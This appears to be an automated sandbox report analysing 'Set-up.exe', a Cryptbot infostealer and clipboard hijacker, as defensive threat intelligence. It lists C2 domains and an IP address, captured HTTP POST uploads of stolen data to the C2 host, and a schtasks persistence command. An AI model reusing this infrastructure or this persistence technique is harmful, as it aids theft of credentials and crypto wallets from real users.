Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name: Set-up.exe
Analysis ID: 1521577
MD5: d9bdb4ba2a45c67f4da4e431ff988605
SHA1: 4cdd27ca0a92a35e5eea6e588422339bdd9b05ba
SHA256: 9e61196ade3f31620d62422741e66bd19f0bd4744e2f6a5f8a2481cfb8f9b9d9
Tags: exeuser-aachum
Infos:

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops large PE files
Found evasive API chain (may stop execution after checking mutex)
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection
barindex
Found malware configuration
Source: Set-up.exe.7100.0.memstrmin Malware Configuration Extractor: Cryptbot {"C2 list": ["+elevenvh11pt.top", "11pt.top", "@elevenvh11pt.top", "elevenvh11pt.top", "analforeverlovyu.top"]}
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_006F15B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 4_2_006F15B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2C14B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 4_2_6C2C14B0
Uses 32bit PE files
Source: Set-up.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: Set-up.exe Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 4_2_006F81E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C33AEC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C33AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C33AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C2E0860
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C2EA970
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C2EA9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C2EA9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C39F990h 4_2_6C2DEB10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C2E4453
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 4_2_6C3684A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C2EC510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C2EA580
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C2EA5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C2EA5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C2EE6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C2EE6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, ecx 4_2_6C360730
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C2E0740
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C33C040
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C33C1A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+04h] 4_2_6C31A1E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C2E0260
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [6C39D014h] 4_2_6C394360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C33BD10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C337D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 4_2_6C333840
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+04h] 4_2_6C2ED974
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C319B60
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C2FBBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C2FBBD7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C33B4D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C2ED504
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 4_2_6C339600
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] 4_2_6C2ED674
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C39DFF4h 4_2_6C333690
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+08h] 4_2_6C2ED7F4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 4_2_6C363140
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C2DB1D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C2ED2A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 4_2_6C357350

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49730 -> 185.244.181.140:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49732 -> 185.244.181.140:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49738 -> 185.244.181.140:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: +elevenvh11pt.top
Source: Malware configuration extractor URLs: 11pt.top
Source: Malware configuration extractor URLs: @elevenvh11pt.top
Source: Malware configuration extractor URLs: elevenvh11pt.top
Source: Malware configuration extractor URLs: analforeverlovyu.top
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.244.181.140 185.244.181.140
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: BELCLOUDBG BELCLOUDBG
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary33730321User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 410Host: elevenvh11pt.top
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary17398190User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 89745Host: elevenvh11pt.top
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary32471747User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 29706Host: elevenvh11pt.top
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: elevenvh11pt.top
Source: unknown HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary33730321User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 410Host: elevenvh11pt.top
Source: Set-up.exe, 00000000.00000003.1838220618.0000000001438000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1838327408.000000000143C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://elevenvh11pt.top/v1/upload.php
Source: Set-up.exe, 00000000.00000003.2309002492.0000000001460000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://elevenvh11pt.top/v1/upload.phpP
Source: Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: HXocObpYbsjxnCpoVLwZ.dll.0.dr String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: Set-up.exe String found in binary or memory: https://serviceupdate32.com/update
Source: Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: Set-up.exe, 00000000.00000003.1879043116.00000000036E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2D9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 4_2_6C2D9C22
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2D9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 4_2_6C2D9C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2D9D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 4_2_6C2D9D11
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2D9E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 4_2_6C2D9E27

System Summary
barindex
Drops large PE files
Source: C:\Users\user\Desktop\Set-up.exe File dump: service123.exe.0.dr 314617856 Jump to dropped file
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_006F51B0 4_2_006F51B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_006F3E20 4_2_006F3E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C302CCE 4_2_6C302CCE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2CCD00 4_2_6C2CCD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2CEE50 4_2_6C2CEE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2D0FC0 4_2_6C2D0FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C310AC0 4_2_6C310AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2D44F0 4_2_6C2D44F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3046E0 4_2_6C3046E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3007D0 4_2_6C3007D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2F87C0 4_2_6C2F87C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C310060 4_2_6C310060
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C302090 4_2_6C302090
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2F2360 4_2_6C2F2360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C31DC70 4_2_6C31DC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2D5880 4_2_6C2D5880
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2F98F0 4_2_6C2F98F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C307A20 4_2_6C307A20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C30DBEE 4_2_6C30DBEE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C30140E 4_2_6C30140E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C311510 4_2_6C311510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C30F610 4_2_6C30F610
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2EF760 4_2_6C2EF760
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2C3000 4_2_6C2C3000
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3850D0 4_2_6C3850D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2D70C0 4_2_6C2D70C0
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C395980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C393560 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C393B20 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C38ADB0 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C3936E0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C393820 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C395A70 appears 77 times
Sample file is different than original file name gathered from version info
Source: Set-up.exe, 00000000.00000002.2324509023.0000000001473000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameschtasks.exej% vs Set-up.exe
Uses 32bit PE files
Source: Set-up.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/2@1/1
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\fvDNEDWLqd Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3512:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\cyUfSaAVoKrgDgBDsopT
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: Set-up.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Set-up.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe" Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: hxocobpybsjxncpovlwz.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: hxocobpybsjxncpovlwz.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: hxocobpybsjxncpovlwz.dll Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: Set-up.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Set-up.exe Static file information: File size 9979392 > 1048576
Source: Set-up.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2c1800
Source: Set-up.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x671200
Source: Set-up.exe Static PE information: DYNAMIC_BASE, NX_COMPAT
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_006F8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 4_2_006F8230
PE file contains sections with non-standard names
Source: Set-up.exe Static PE information: section name: .eh_fram
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: HXocObpYbsjxnCpoVLwZ.dll.0.dr Static PE information: section name: .eh_fram
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_006FA499 push es; iretd 4_2_006FA694
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C370C30 push eax; mov dword ptr [esp], edi 4_2_6C370DAA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C33ED10 push eax; mov dword ptr [esp], ebx 4_2_6C33EE33
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C314E31 push eax; mov dword ptr [esp], ebx 4_2_6C314E45
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C308E7A push edx; mov dword ptr [esp], ebx 4_2_6C308E8E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C30A947 push eax; mov dword ptr [esp], ebx 4_2_6C30A95B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C33EAB0 push eax; mov dword ptr [esp], ebx 4_2_6C33EBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C328AA0 push eax; mov dword ptr [esp], ebx 4_2_6C32909F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C310AA2 push eax; mov dword ptr [esp], ebx 4_2_6C310AB6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C312AAC push edx; mov dword ptr [esp], ebx 4_2_6C312AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C342BF0 push eax; mov dword ptr [esp], ebx 4_2_6C342F24
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C342BF0 push edx; mov dword ptr [esp], ebx 4_2_6C342F43
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C308435 push edx; mov dword ptr [esp], ebx 4_2_6C308449
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C328460 push eax; mov dword ptr [esp], ebx 4_2_6C328A5F
